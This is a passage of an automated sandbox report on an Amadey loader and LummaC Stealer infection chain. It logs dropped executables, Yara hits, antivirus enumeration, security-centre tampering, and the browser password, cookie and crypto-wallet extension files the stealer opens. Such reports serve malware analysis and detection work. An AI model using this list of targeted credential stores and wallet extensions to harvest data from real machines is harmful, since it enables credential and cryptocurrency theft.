Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041880101\01ea7855d3.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041880101\01ea7855d3.exe VolumeInformation
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E3D21C GetLocalTime, 0_2_00E3D21C
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E3D27A GetUserNameW, 0_2_00E3D27A
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
AV process strings found (often used to terminate AV products)
Source: Null.44.dr Binary or memory string: processed file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Null.44.dr Binary or memory string: processed file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys Clipper DLL
Source: Yara match File source: 41.0.amnew.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.0.futors.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.futors.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.0.futors.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.amnew.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.991468562.0000000000B01000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.996423786.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.916472525.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.949456172.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.955918275.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1336929866.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe, type: DROPPED
Yara detected LummaC Stealer
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.1569736725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
